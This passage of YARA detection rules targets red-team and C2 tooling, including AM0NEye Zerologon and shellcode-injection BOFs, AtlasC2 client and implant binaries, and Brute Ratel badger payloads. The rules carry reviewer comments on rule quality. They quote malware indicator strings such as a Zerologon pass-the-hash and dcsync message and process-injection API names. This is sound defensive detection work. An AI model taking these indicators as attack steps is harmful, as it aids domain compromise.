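        $s15 = "Microsoft (R) Optimizing Compiler" ascii fullword
        $s16 = "$SG87893H" ascii fullword
        $s17 = "$SG87894x" ascii fullword
        $s18 = "$SG87891" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 5KB -- confirm.
        filesize < 5KB and
        (
            hash.sha256(0, filesize) == "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}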
|
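import "hash"

// AM0NEye - zerologon.x86.o: 32-bit build of the Zerologon BOF (see the x64
// rule). Same Netlogon imports with stdcall-style leading underscores, plus
// the Beacon API imports; $s13 is the empty-password NT hash.
rule AM0NEye_ZerologonX86
{
    meta:
        description = "AM0NEye - zerologon.x86.o"
        sha256 = "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07"

    strings:
        $s1 = "Z:\\devcenter\\zerologon\\dist\\zerologon.x86.o" ascii fullword
        $s2 = "%S is not vulnerable" ascii fullword
        $s3 = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" ascii fullword
        $s4 = "__imp__NETAPI32$I_NetServerPasswordSet2" ascii fullword
        $s5 = "Failed to set machine account pass for %S" ascii fullword
        // $s6-$s8, $s15-$s18: MSVC linker directives, compiler banner and
        // compiler-numbered string symbols. Generic or build-specific.
        $s6 = "P` /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " ascii fullword
        $s7 = "@comp.id}y" ascii fullword
        $s8 = "B.data" ascii fullword
        $s9 = "__imp__BeaconDataExtract" ascii fullword
        $s10 = "__imp__BeaconPrintf" ascii fullword
        $s11 = "__imp__BeaconDataParse" ascii fullword
        $s12 = "__imp__NETAPI32$I_NetServerReqChallenge" ascii fullword
        // Substring of $s3 (no fullword), so it double-counts with $s3.
        $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0"
        $s14 = "__imp__NETAPI32$I_NetServerAuthenticate2" ascii fullword
        $s15 = "Microsoft (R) Optimizing Compiler" ascii fullword
        $s16 = "$SG87301" ascii fullword
        $s17 = "$SG87303H" ascii fullword
        $s18 = "$SG87304t" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 4KB -- confirm.
        filesize < 4KB and
        (
            hash.sha256(0, filesize) == "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07"
            or (uint16(0) == 0x014c and 8 of them)
        )
}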
|
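import "hash"

// AM0NEye - curl.x86.o: 32-bit build of the WinINet HTTP BOF (see CurlX64);
// stdcall "@N" import decorations plus the Beacon API imports.
rule AM0NEye_CurlX86
{
    meta:
        description = "AM0NEye - curl.x86.o"
        sha256 = "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4"

    strings:
        $s1 = "User Agent: %s" ascii fullword
        $s2 = "__imp__KERNEL32$lstrlenA@4" ascii fullword
        $s3 = "Retrieving HTTP Request info failed" ascii fullword
        $s4 = "__imp__WININET$HttpSendRequestA@20" ascii fullword
        $s5 = "__imp__WININET$InternetReadFile@16" ascii fullword
        $s6 = "__imp__WININET$HttpQueryInfoA@20" ascii fullword
        $s7 = "__imp__WININET$HttpOpenRequestA@32" ascii fullword
        $s8 = "%s %s:%i %s" ascii fullword
        $s9 = "Response Code: %s" ascii fullword
        $s10 = "entry.c" ascii fullword
        $s11 = "No response." ascii fullword
        $s12 = "__imp__BeaconDataInt" ascii fullword
        $s13 = "__imp__WININET$InternetCloseHandle@4" ascii fullword
        $s14 = "__imp__WININET$InternetOpenA@20" ascii fullword
        $s15 = "__imp__BeaconDataExtract" ascii fullword
        $s16 = "__imp__WININET$InternetConnectA@32" ascii fullword
        $s17 = "__imp__MSVCRT$strtok" ascii fullword
        $s18 = "__imp__MSVCRT$strcmp" ascii fullword
        $s19 = "__imp__BeaconPrintf" ascii fullword
        $s20 = "__imp__BeaconDataParse" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 9KB -- confirm.
        filesize < 9KB and
        (
            hash.sha256(0, filesize) == "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4"
            or (uint16(0) == 0x014c and 8 of them)
        )
}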
|
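import "hash"

// AM0NEye - syscallsapcspawn.x64.o: 64-bit BOF that spawns a temporary
// process through the Beacon API (BeaconSpawnTemporaryProcess /
// BeaconCleanupProcess) and injects via section mapping + NtQueueApcThread
// using SysWhispers2-style (SW2_*) direct syscalls.
rule AM0NEye_SyscallsapcspawnX64
{
    meta:
        description = "AM0NEye - syscallsapcspawn.x64.o"
        sha256 = "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61"

    strings:
        $s1 = "Shellcode injection completed successfully!" ascii fullword
        $s2 = "__imp_BeaconSpawnTemporaryProcess" ascii fullword
        $s3 = "Failed to spawn process." ascii fullword
        $s4 = "InjectShellcode" ascii fullword
        $s5 = "Failed to spawn process. Exiting..." ascii fullword
        $s6 = "NtResumeThread - FAILED! X" ascii fullword
        $s7 = "Spawned Process with PID: %d" ascii fullword
        $s8 = "NtQueueApcThread - FAILED! X" ascii fullword
        $s9 = "__imp_BeaconCleanupProcess" ascii fullword
        $s10 = "NtUnmapViewOfSection - FAILED! X" ascii fullword
        $s11 = "NtCreateSection - FAILED! X" ascii fullword
        $s12 = "NtMapViewOfSection2 - FAILED! X" ascii fullword
        $s13 = "NtMapViewOfSection - FAILED! X" ascii fullword
        $s14 = "SW2_GetSyscallNumber" ascii fullword
        $s15 = "entry.c" ascii fullword
        $s16 = "__imp_MSVCRT$memcpy" ascii fullword
        $s17 = "__imp_BeaconDataLength" ascii fullword
        $s18 = "SW2_HashSyscall" ascii fullword
        // Compiler banner and section bytes: toolchain-specific, brittle.
        $s19 = "GCC: (GNU) 10-win32 20200525" ascii fullword
        $s20 = "0@.rdata" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 30KB -- confirm.
        // $s1, $s4, $s14, $s18 overlap with AM0NEye_SyscallsinjectX64.
        filesize < 30KB and
        (
            hash.sha256(0, filesize) == "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}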
|
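import "hash"

// AM0NEye - popCalc.bin: raw x64 shellcode that launches calc.exe. $s1/$s2
// are the ASCII rendering of push/pop register sequences common to x64
// stager prologues (the bytes are opcodes, not text); uint16(0) == 0x48fc
// is the leading byte pair FC 48 (cld followed by a REX.W prefix) read
// little-endian.
rule AM0NEye_PopCalc
{
    meta:
        description = "AM0NEye - popCalc.bin"
        sha256 = "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca"

    strings:
        $s1 = "AQAPRQVH1" ascii fullword
        $s2 = "AXAX^YZAXAYAZH" ascii fullword
        $s3 = "calc.exe" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for tiny
        // candidates. Assumes the reference sample is under 1KB -- confirm.
        // "all of them" with only three short strings is narrow: any
        // calc-popping x64 shellcode with the same prologue will match, which
        // is presumably the intent (test/PoC payload, not a unique implant).
        filesize < 1KB and
        (
            hash.sha256(0, filesize) == "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca"
            or (uint16(0) == 0x48fc and all of them)
        )
}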
|
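import "hash"
import "pe"

// AtlasC2 - Client.dll: the .NET operator client (the command help text and
// "[*] Usage:" strings are wide, as .NET string literals are). $x1/$x2 are the
// distinctive help strings; the rest are command/usage text and assembly
// metadata ("Implant", "teamserver"). The pe module is imported but unused.
rule AtlasC2_ClientDll
{
    meta:
        description = "AtlasC2 - Client.dll"
        sha256 = "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d"

    strings:
        $x1 = "Executes a command in the context of cmd.exe" wide fullword
        $x2 = "Execute a PS command using the PS DLLs" wide fullword
        $s3 = "command to execute" wide fullword
        $s4 = "Client.dll" wide fullword
        $s5 = "[*] Usage: RmDir [targetDir]" wide fullword
        $s6 = "[*] Usage: RmFile [targetFile]" wide fullword
        $s7 = "Fetch user id of user running implant process" wide fullword
        $s8 = "<UtilExecute>b__0" ascii fullword
        $s9 = "UtilExecute" ascii fullword
        $s10 = "<UtilExecute>b__8_0" ascii fullword
        $s11 = "ExecuteAssemMethod" wide fullword
        $s12 = "ExecuteAssem" wide fullword
        $s13 = "[*] Usage: Getuid" wide fullword
        $s14 = "Execute a specifed assem type from its entry point" wide fullword
        $s15 = "Executes specified method belonging to a loaded assem type" wide fullword
        $s16 = "[-] Connection to teamserver could not be established or no implant currently set" wide fullword
        $s17 = "path to PowerShell file to load into implant process" wide fullword
        $s18 = "byte array to load into implant process" wide fullword
        // Generic .NET type references; they carry almost no weight on their own.
        $s19 = "System.ComponentModel.Primitives" ascii fullword
        $s20 = "System.Net.WebClient" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 100KB -- confirm.
        filesize < 100KB and
        (
            hash.sha256(0, filesize) == "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d"
            or (uint16(0) == 0x5a4d and 1 of ($x*) and 4 of them)
        )
}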
|
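import "pe"
import "hash"

// AtlasC2 - Implant.exe: the .NET implant. The specific strings are the
// Implant.* namespaces/types ($s1, $s2, $s7, $s19) and ExecuteAssem*; the
// get_/set_/k__BackingField entries and the asInvoker manifest are generic
// .NET compiler output found in most C# binaries.
rule AtlasC2_Implant
{
    meta:
        description = "AtlasC2 - Implant.exe"
        sha256 = "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09"

    strings:
        $s1 = "Implant.Tasks.Execute" ascii fullword
        $s2 = "Implant.exe" wide fullword
        $s3 = "ExecuteAssemMethod" wide fullword
        $s4 = "ExecuteAssem" wide fullword
        $s5 = "ExecuteAssemEP" ascii fullword
        $s6 = " loaded into implant process" wide fullword
        $s7 = "(Implant.Models.HTTPComms+<PostData>d__18" ascii fullword
        $s8 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s9 = "<targetDir>k__BackingField" ascii fullword
        $s10 = "get_targetFile" ascii fullword
        $s11 = "set_targetDir" ascii fullword
        $s12 = "<targetFile>k__BackingField" ascii fullword
        $s13 = "get_targetDir" ascii fullword
        $s14 = "set_targetFile" ascii fullword
        $s15 = "GetHostIP" ascii fullword
        $s16 = "<targetPath>k__BackingField" ascii fullword
        $s17 = "get_Encoded" ascii fullword
        $s18 = "set_targetPath" ascii fullword
        $s19 = "ImplantCommands" ascii fullword
        $s20 = "set_UseShellExecute" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 100KB -- confirm.
        // NOTE(review): "8 of them" can be met by the generic .NET property
        // accessors alone ($s8-$s18, $s20); consider requiring one of the
        // Implant-specific strings ($s1, $s2, $s7, $s19) if this rule proves
        // noisy on benign C# tooling with targetDir/targetFile properties.
        filesize < 100KB and
        (
            hash.sha256(0, filesize) == "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09"
            or (
                uint16(0) == 0x5a4d
                and pe.characteristics & pe.EXECUTABLE_IMAGE
                and 8 of them
            )
        )
}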
|
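import "pe"
import "hash"

// AtlasC2 - Client.exe: this is the stock .NET "apphost" launcher that
// framework-dependent .NET builds produce, bound to Client.dll. Apart from
// $s5, every string below (hostfxr.dll, Microsoft's apphost.pdb build path,
// the "A fatal error was encountered..." / "Installing .NET prerequisites"
// messages) is present in the apphost.exe of EVERY .NET application, so the
// original "8 of them" matched essentially any .NET app launcher on disk.
rule AtlasC2_Client
{
    meta:
        description = "AtlasC2 - Client.exe"
        sha256 = "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b"

    strings:
        $s1 = "hostfxr.dll" wide fullword
        $s2 = "--- Invoked %s [version: %s, commit hash: %s] main = {" wide fullword
        $s3 = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" wide fullword
        $s4 = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\standalone\\Release\\apphost.pdb" ascii fullword
        // The only AtlasC2-specific string: the managed DLL this apphost is
        // bound to. Still weak on its own ("Client.dll" is a common name).
        $s5 = "Client.dll" wide fullword
        $s6 = " - %s&apphost_version=%s" wide fullword
        $s7 = "The managed DLL bound to this executable is: '%s'" wide fullword
        $s8 = "A fatal error was encountered. This executable was not bound to load a managed DLL." wide fullword
        $s9 = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s'" wide fullword
        $s10 = "Failed to resolve full path of the current executable [%s]" wide fullword
        $s11 = "https://go.microsoft.com/fwlink/?linkid=798306" wide fullword
        $s12 = "The managed DLL bound to this executable could not be retrieved from the executable image." wide fullword
        $s13 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s14 = " - Installing .NET prerequisites might help resolve this problem." wide fullword
        $s15 = " - https://aka.ms/dotnet-core-applaunch?" wide fullword
        $s16 = "Failed to load the dll from [%s], HRESULT: 0x%X" wide fullword
        $s17 = "The required library %s does not support relative app dll paths." wide fullword
        $s18 = "Failed to read environment variable [%s], HRESULT: 0x%X" wide fullword
        $s19 = "The application to execute does not exist: '%s'." wide fullword
        $s20 = "apphost" wide fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 400KB -- confirm.
        // The string branch now requires the bound-DLL name ($s5) in addition
        // to the apphost boilerplate; treat a hit as "a .NET apphost bound to
        // Client.dll" and pivot to the DLL itself (AtlasC2_ClientDll) to confirm.
        filesize < 400KB and
        (
            hash.sha256(0, filesize) == "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b"
            or (
                uint16(0) == 0x5a4d
                and pe.characteristics & pe.EXECUTABLE_IMAGE
                and $s5
                and 8 of them
            )
        )
}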
|
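import "hash"
import "pe"
import "math"

// BruteRatel - badger_x64.dll (two reference hashes). The readable strings
// are MinGW pseudo-relocation runtime messages ($s2, $s3, $s5, $s9), which
// any MinGW-built DLL contains; $s1/$s21 are the randomized export names of
// the two samples; the remaining short strings are opaque byte runs from a
// high-entropy body and will not generalise beyond these exact builds.
rule BruteRatel_BadgerDll_x64
{
    meta:
        description = "BruteRatel - badger_x64.dll"
        sha256_1 = "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307"
        sha256_2 = "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e"

    strings:
        $s1 = "HK2PVH1A.dll" ascii fullword
        $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword
        $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword
        $s4 = "$K~D:\\" ascii fullword
        $s5 = " VirtualProtect failed with code 0x%x" ascii fullword
        $s6 = "^CN:\\Z" ascii fullword
        // $s7 and $s8 are ASCII renderings of x64 push/pop register sequences
        // (opcode bytes, not text). The original also listed $s7's value a
        // second time as $s22; that duplicate made a single occurrence count
        // twice toward "8 of them" and has been removed.
        $s7 = "AYAXZYPAQH" ascii fullword
        $s8 = "AWAVAUATM" ascii fullword
        $s9 = " Unknown pseudo relocation protocol version %d." ascii fullword
        $s10 = " -9.6p" ascii fullword
        $s11 = "fv* VE" ascii fullword
        $s12 = "> /Mq/" ascii fullword
        $s13 = "ygfL,.'" ascii fullword
        $s14 = "POIOWiAu" ascii fullword
        $s15 = "^(d{f>v AXQRAPAQL" ascii fullword
        $s16 = "GxnyNxL" ascii fullword
        $s17 = "UQAi1qv" ascii fullword
        $s18 = "tJmyU}1" ascii fullword
        $s19 = "!qtel-oT" ascii fullword
        $s20 = "QRDJB2Q" ascii fullword
        $s21 = "C3OQGC2D.dll" ascii fullword

    condition:
        // Size gate first so hash.sha256() and math.entropy() -- both full-file
        // reads -- are only evaluated on candidates under the bound. Assumes
        // both reference samples are under 700KB -- confirm. Within the
        // heuristic branch the cheap header/import checks run before entropy.
        filesize < 700KB and
        (
            hash.sha256(0, filesize) == "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307"
            or hash.sha256(0, filesize) == "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e"
            or (
                uint16(0) == 0x5a4d
                and pe.characteristics & pe.DLL
                and pe.imports("kernel32.dll", "VirtualProtect")
                and 8 of them
                and math.entropy(0, filesize) >= 7
            )
        )
}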
|
import "math"
import "hash"

// BruteRatel - badger_x64_RtlExitUserThread.bin (raw x64 shellcode blob).
// uint16(0) == 0x8348 means the blob starts with bytes 48 83 (REX.W prefix +
// a sub/and-on-rsp style instruction) - inferred from the byte values.
// $s1/$s2/$s16 read as the ASCII view of x64 push/pop register opcode
// sequences; the rest are fragments of the high-entropy payload and are not
// expected to generalise beyond the two listed samples, so the non-hash branch
// is effectively "entropy >= 7 blob under 700KB with this entry byte pair".
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule BruteRatel_BadgerBin_x64_RtlExitUserThread {
    meta:
        description = "BruteRatel - badger_x64_RtlExitUserThread.bin"
        sha256_1 = "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8"
        sha256_2 = "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583"
    strings:
        $s1 = "AYAXZYPAQH" ascii fullword
        $s2 = "AWAVAUATM" ascii fullword
        $s3 = "tpGb#_," ascii fullword
        $s4 = "OEvy[)q" ascii fullword
        $s5 = "pmiSTvdy" ascii fullword
        $s6 = "TaLcDw;lI" ascii fullword
        $s7 = "MrVeO[9" ascii fullword
        $s8 = "WUtEFwQX" ascii fullword
        $s9 = "9WVZeLFi" ascii fullword
        $s10 = "eIvV0h+" ascii fullword
        $s11 = "zllG!r*" ascii fullword
        $s12 = "mZnFr_." ascii fullword
        $s13 = "sLIv9`0T" ascii fullword
        $s14 = "$vufz?" ascii fullword
        $s15 = "Q5/*}@}ud%AXQRAPAQL" ascii fullword
        $s16 = "AWAVAUATWVH" ascii fullword
        $s17 = "oaNpx3" ascii fullword
        $s18 = "\\0X/pa" ascii fullword
        $s19 = "VfaFB0" ascii fullword
        $s20 = "\\x(BEI" ascii fullword
        $s21 = "ZgaoJ,9" ascii fullword
        $s22 = "IpKSfvlR" ascii fullword
        $s23 = "d%>d$/:iAXQRAPAQL" ascii fullword
        $s24 = "/Yesbu/6" ascii fullword
        $s25 = "teXrmE<" ascii fullword
    condition:
        hash.sha256(0, filesize) == "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8"
        or hash.sha256(0, filesize) == "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583"
        or (
            math.entropy(0, filesize) >= 7
            and uint16(0) == 0x8348
            and filesize < 700KB
            and 6 of them
        )
}
|
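import "pe"
import "math"
import "hash"

// BruteRatel - badger_x64_service.exe (service-wrapped badger).
// $s1/$s6 are the two halves of a decoy service description styled after a
// Windows component and $s7 the service name it registers under - useful
// host-side hunting pivots (service names / descriptions), presumably; the
// advapi32 service-control imports in the condition match that packaging.
// $s2/$s3/$s5/$s10 are MinGW pseudo-relocation runtime messages (generic);
// the short high-entropy strings are payload fragments specific to these two
// samples. $s1 has no modifiers because it is a 128-char truncation, not a
// whole string.
// Fix: the original declared the same "Manages universal application..."
// string as both $s1 and $s4, so one hit counted twice toward "8 of them";
// the duplicate $s4 is dropped.
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule BruteRatel_BadgerService_x64 {
    meta:
        description = "BruteRatel - badger_x64_service.exe"
        sha256_1 = "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8"
        sha256_2 = "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154"
    strings:
        $s1 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer"
        $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword
        $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword
        $s5 = " VirtualProtect failed with code 0x%x" ascii fullword
        $s6 = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." ascii fullword
        $s7 = "TransactionBrokerService" ascii fullword
        $s8 = "AYAXZYPAQH" ascii fullword
        $s9 = "AWAVAUATM" ascii fullword
        $s10 = " Unknown pseudo relocation protocol version %d." ascii fullword
        $s11 = "\\BeiSp /" ascii fullword
        $s12 = "BZ' -aH" ascii fullword
        $s13 = ">qP'4- J>" ascii fullword
        $s14 = ":MZuWHcB<H" ascii fullword
        $s15 = "JNacN'j" ascii fullword
        $s16 = "'BYMX?k" ascii fullword
        $s17 = "!FruL1ZLWlM9" ascii fullword
        $s18 = "oRvNu7I" ascii fullword
        $s19 = "oqd!a #saAXQRAPAQL" ascii fullword
        $s20 = "c-QVpl*bUM" ascii fullword
    condition:
        hash.sha256(0, filesize) == "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8"
        or hash.sha256(0, filesize) == "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154"
        or (
            math.entropy(0, filesize) >= 7
            and pe.imports("kernel32.dll", "VirtualProtect")
            and pe.imports("advapi32.dll", "ChangeServiceConfig2A")
            and pe.imports("advapi32.dll", "ChangeServiceConfigA")
            and pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA")
            and pe.characteristics & pe.EXECUTABLE_IMAGE
            and uint16(0) == 0x5a4d
            and filesize < 700KB
            and 8 of them
        )
}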
|
import "math"
import "hash"

// BruteRatel - badger_x64_stealth_RtlExitUserThread.bin (raw x64 shellcode).
// Entry check uint16(0) == 0x8348 = leading bytes 48 83. $s1-$s3 read as the
// ASCII view of x64 push/pop register opcode sequences (inferred from the
// byte values); everything else is a fragment of the encrypted payload and
// only recurs in the two listed samples, so outside the hash branch the rule
// leans on entropy >= 7, the entry bytes and the size cap.
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule BruteRatel_BadgerStealthBin_x64_RtlExitUserThread {
    meta:
        description = "BruteRatel - badger_x64_stealth_RtlExitUserThread.bin"
        sha256_1 = "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c"
        sha256_2 = "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324"
    strings:
        $s1 = "AYAXZYPAQH" ascii fullword
        $s2 = "AWAVAUATM" ascii fullword
        $s3 = "AWAVAUM" ascii fullword
        $s4 = "bhfSv!6" ascii fullword
        $s5 = "VrdJrcU" ascii fullword
        $s6 = "tXRC4DCWt" ascii fullword
        $s7 = "6rhfN^4qyW" ascii fullword
        $s8 = "kejA\"'" ascii fullword
        $s9 = "LgVSX[4>" ascii fullword
        $s10 = "CXaAb4D6" ascii fullword
        $s11 = "XjXxiQ?" ascii fullword
        $s12 = "MOpm~vr" ascii fullword
        $s13 = "mmq&e$ddAXQRAPAQL" ascii fullword
        $s14 = "Jiysu^[r" ascii fullword
        $s15 = "_(t.oGR" ascii fullword
        $s16 = "tKTU7!2" ascii fullword
        $s17 = "xUdcmD" ascii fullword
        $s18 = "|owVVk)DK" ascii fullword
        $s19 = "EtPevsx" ascii fullword
        $s20 = "samgQ\"" ascii fullword
        $s21 = ".sWP&|" ascii fullword
        $s22 = "\"(hvLZ\\wE" ascii fullword
        $s23 = ",.MMgQ)y<" ascii fullword
        $s24 = "+ l%(U^u" ascii fullword
        $s25 = "SxjTLZ2" ascii fullword
        $s26 = "OJQx>$-=" ascii fullword
        $s27 = "|JXPC}5Q" ascii fullword
    condition:
        hash.sha256(0, filesize) == "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c"
        or hash.sha256(0, filesize) == "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324"
        or (
            math.entropy(0, filesize) >= 7
            and uint16(0) == 0x8348
            and filesize < 700KB
            and 8 of them
        )
}
|
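import "pe"
import "math"
import "hash"

// BruteRatel - badger_x64_stealth_service.exe (service-wrapped stealth badger).
// $s1/$s7 are halves of a decoy service description and $s8 the service name;
// $s2/$s3/$s6/$s12 are MinGW pseudo-relocation runtime messages (generic);
// $s9-$s11 read as ASCII of x64 push/pop opcode sequences (inferred); the
// short high-entropy strings are payload fragments specific to this sample.
// $s1 carries no modifiers because it is a 128-char truncation.
// Fix: the original declared the "Manages universal application..." string
// as both $s1 and $s4, double-counting one hit toward "8 of them"; the
// duplicate $s4 is dropped.
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule BruteRatel_BadgerStealthService_x64 {
    meta:
        description = "BruteRatel - badger_x64_stealth_service.exe"
        sha256 = "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce"
    strings:
        $s1 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer"
        $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword
        $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword
        $s5 = "pggmopa" ascii fullword
        $s6 = " VirtualProtect failed with code 0x%x" ascii fullword
        $s7 = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." ascii fullword
        $s8 = "TransactionBrokerService" ascii fullword
        $s9 = "AYAXZYPAQH" ascii fullword
        $s10 = "AWAVAUATM" ascii fullword
        $s11 = "AWAVAUM" ascii fullword
        $s12 = " Unknown pseudo relocation protocol version %d." ascii fullword
        $s13 = "p62%q%" ascii fullword
        $s14 = "yqfgcr0" ascii fullword
        $s15 = ":MZuWHcB<H" ascii fullword
        $s16 = "V_XgIY!*" ascii fullword
        $s17 = "chPcT0X" ascii fullword
        $s18 = "kVea&{(" ascii fullword
        $s19 = "R?vnooO]L" ascii fullword
        $s20 = "rQPx[,D" ascii fullword
    condition:
        hash.sha256(0, filesize) == "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce"
        or (
            math.entropy(0, filesize) >= 7
            and pe.imports("kernel32.dll", "VirtualProtect")
            and pe.imports("advapi32.dll", "ChangeServiceConfig2A")
            and pe.imports("advapi32.dll", "ChangeServiceConfigA")
            and pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA")
            and pe.characteristics & pe.EXECUTABLE_IMAGE
            and uint16(0) == 0x5a4d
            and filesize < 700KB
            and 8 of them
        )
}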
|
import "math"
import "hash"

// BruteRatel - badger_x64_stealth_WaitForSingleObject.bin (raw x64 shellcode).
// Entry check uint16(0) == 0x8348 = leading bytes 48 83. $s2-$s4 read as the
// ASCII view of x64 push/pop register opcode sequences (inferred); the other
// strings are fragments of the encrypted payload tied to these two samples.
// Outside the hash branch the rule relies on entropy >= 7, the entry bytes and
// the 700KB cap. hash.sha256 is the leftmost operand and is computed over
// every scanned file before the cheap checks.
rule BruteRatel_BadgerStealthBin_x64_WaitForSingleObject {
    meta:
        description = "BruteRatel - badger_x64_stealth_WaitForSingleObject.bin"
        sha256_1 = "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c"
        sha256_2 = "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df"
    strings:
        $s1 = "-},p:\\" ascii fullword
        $s2 = "AYAXZYPAQH" ascii fullword
        $s3 = "AWAVAUATM" ascii fullword
        $s4 = "AWAVAUM" ascii fullword
        $s5 = "\\o /No" ascii fullword
        $s6 = "mRCBh0e" ascii fullword
        $s7 = "iIHGF\\(" ascii fullword
        $s8 = "@$$)#|v}AXQRAPAQL" ascii fullword
        $s9 = "QaLb5+y" ascii fullword
        $s10 = "DsWN8F\\L" ascii fullword
        $s11 = "EscU,yQPaeB" ascii fullword
        $s12 = "|XRTiqS{" ascii fullword
        $s13 = "MXxG)]q" ascii fullword
        $s14 = "zesf!ub" ascii fullword
        $s15 = "_riizb_6" ascii fullword
        $s16 = "BABqh\\" ascii fullword
        $s17 = "xFMD@CH" ascii fullword
        $s18 = "eAtA_b-" ascii fullword
        $s19 = "R$.Naq" ascii fullword
        $s20 = "gQId?99<" ascii fullword
        $s21 = "N!^ /O" ascii fullword
        $s22 = "AqckaG(c" ascii fullword
        $s23 = "=ESzR=LH" ascii fullword
        $s24 = "50szmET|E" ascii fullword
        $s25 = "}- 0I$e" ascii fullword
    condition:
        hash.sha256(0, filesize) == "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c"
        or hash.sha256(0, filesize) == "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df"
        or (
            math.entropy(0, filesize) >= 7
            and uint16(0) == 0x8348
            and filesize < 700KB
            and 8 of them
        )
}
|
import "math"
import "hash"

// BruteRatel - badger_x64_WaitForSingleObject.bin (raw x64 shellcode).
// Entry check uint16(0) == 0x8348 = leading bytes 48 83. $s1/$s2 read as the
// ASCII view of x64 push/pop register opcode sequences (inferred); the rest
// are fragments of the encrypted payload tied to these two samples. The
// identifier sequence skips $s26 in the original; that is only a numbering gap.
// Outside the hash branch the rule relies on entropy >= 7, the entry bytes and
// the 700KB cap. hash.sha256 is the leftmost operand and is computed over
// every scanned file.
rule BruteRatel_BadgerBin_x64_WaitForSingleObject {
    meta:
        description = "BruteRatel - badger_x64_WaitForSingleObject.bin"
